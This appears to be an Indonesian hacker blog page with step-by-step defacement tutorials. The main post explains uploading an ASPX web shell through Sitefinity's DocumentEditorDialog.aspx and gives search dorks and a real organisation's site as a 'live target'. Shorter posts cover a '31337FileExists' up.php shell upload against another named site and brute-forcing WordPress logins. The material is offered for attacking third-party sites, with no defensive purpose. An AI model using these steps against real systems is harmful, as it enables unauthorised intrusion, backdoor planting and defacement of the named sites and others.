Oleh
Exploit CMS Sitefinity Editor Dialogs [ Upload Shell ]

Sudah Lama Ga ada Postingan nih Blog :'v Cuma mau share Exploit lama yang masih Banyak Targetnya :'v Yaitu "Exploit CMS Sitefinity Editor Dialogs" Mungkin dah ada Yang pernah makenya :'v

Langsung Saja...

Bahan :
1. shell aspx => Yang belom punya download disini
   passwordnya : admin

2. Dork : - inurl:"/Sitefinity/login.aspx"
                - "UserControls/Dialogs"
                - "Sitefinity: Login"

3.  Exploit : /sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx

4. Dan yang paling Penting => "KESABARAN" :'v


Step By Step :

1. Dorking dulu ke Google inurl:"/Sitefinity/login.aspx"
2. Pilih Salah Satu Web Target
    Live Target : http://www.calstart.org/
3. Masukkan Exploitnya Site.target/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx
    Contoh : http://www.calstart.org/sitefinity/UserControls/Dialogs/DocumentEditorDialog.aspx

Maka akan Seperti ini
4. Tinggal Kalian Upload shell aspx nya :'v 
    Tekan "select" => Pilih file upload => "upload selected"
5. Kemungkinan Vuln maka Tampilannya akan Seperti ini

6. Tinggal Buka akses shell kalian :'v
     Akses shell => site.target/Files/nameshell.aspx


Terimakasih Atas Kunjungannya :)

Nitip Nick
=> ./AnChan <=


Sekianlah Postingan Dari ./AnChan tentang "Exploit CMS Sitefinity Editor Dialogs [ Upload Shell ]" Semoga Bisa Bermanfaat!.
Hy I'm From Hallucination Cyber

Komentar

Posting Komentar

Oce :*

./AnChan

31337FileExists Exploit and Upload Shell

Oleh
Gambar
31337FileExists Exploit and Upload Shell Bahan Bahan : 1. Dork : - "31337FileExists"                 -  "31337FileExists" inurl:"node" 2. Exploit : /sites/default/files/up.php 3. Shell Backdoor :      Shell mini ( Jika Shell biasa tidak support ) :  Download 4. Script Deface :  Download Step By Step : 1. Dorking dulu di Google  "31337FileExists" 2. Pilih Salah Satu Web     Live Target :  http://roundhousearchitecture.com/ 3. Masukkan Exploit :  sites/default/files/up.php     contoh :  http://roundhousearchitecture.com/ sites/default/files/up.php     Jika Vuln akan ada Tempat Upload seperti ini 4. Tinggal Upload deh shell backdoor kalian  Jika sukses akan seperti ini 5. Tinggal masuk deh ke akses shell yang udah di Upload      Akses shell : / sites/default/files/[nama_shell].php     contoh :  http://roundhousearchitecture.com/ sites/default/files/guel.php Dan BeginiLah Hasilnya Terserah Kalian
Baca Disini Bangsat

Cara WP BruteForce Online dan Menggunakan Python Wordpress BruteForce

Oleh
Gambar
Cara WP BruteForce Online dan Menggunakan Python Wordpress BruteForce Sesuai dengan judulnya, disini saya akan memberikan tutorial Deface WordPress Dengan Tool BruteForce Online dan dengan Menggunakan Python WordPress BruteForce. Yah.. Dua cara satu postingan ^_^ Pertama Tutorial WP BruteForce Menggunakan Python WordPress BruteForce Bahan : Python         Script Python           NB : Setelah Python Terinstal, copy script python lalu save dengan format .py Wordlist Dork : - inurl:wp-login.php            - Author/admin "text" Step By Step : 1. Cari dulu site WP yang akan di WP BruteForce menggunakan dork diatas 2. Cari username WP-nya dengan menggunakan tools ada searching google :v Use Your Brain :'v     cara mudahnya dengan memasukkan username "admin" lalu memasukkan password asal dulu Jika muncul Notif seperti dibawah ini berarti usernamenya admin 3. Tinggal kita BruteForce Passwordnya 4. Instal Dahulu Python-nya 5. Setelah
Baca Disini Bangsat